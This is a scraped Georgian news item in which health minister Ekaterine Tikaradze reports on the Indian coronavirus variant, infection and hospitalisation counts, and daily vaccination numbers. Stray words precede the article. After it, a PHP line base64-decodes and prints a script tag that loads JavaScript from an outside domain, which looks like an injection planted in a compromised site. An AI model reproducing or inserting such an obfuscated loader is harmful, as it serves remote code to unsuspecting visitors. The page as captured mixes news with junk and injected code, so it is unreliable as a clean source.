celsiusi
ავერსი შნაიდერი
ჯანდაცვის მინისტრის ეკატერინე ტიკარაძის განცხადებით, კორონავირუსის ინდურ ვარიანტს აქვს არა თანმიმდევრული, არამედ ნახტომისებური ზრდა. 
 
მისივე თქმით, დღესდღეობით, ინფიცირების ჯამური რაოდენობით მივაღწიეთ 39 000-მდე, საიდანაც 6500-მდე დღეს მკურნალობს სტაციონარში.
 
"დღეის მდგომარეობით, ჩვენ უკვე ყოველდღიურად გვყავს 4000-მდე ინფიცირებული. ჩვენ ხშირად ვამბობთ, რომ კორონავირუსის ამ შტამს აქვს არა თანმიმდევრული, არამედ ნახტომისებური ზრდა. დღესდღეობით, ინფიცირების ჯამური რაოდენობით მივაღწიეთ 39 000-მდე, საიდანაც 6500-მდე დღეს მკურნალობს სტაციონარში.
 
მოსახლეობის დამყოლობა ვაქცინაციის პროცესში საკმაოდ მაღალია. ჩვენ ბოლო რამდენიმე დღის განმავლობაში, ვაქცინაციის დღიური მაჩვენებლით 19 000-ს გადავაჭარბეთ,"-აცხადებს ჯანდაცვის მინისტრი. 
1128
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");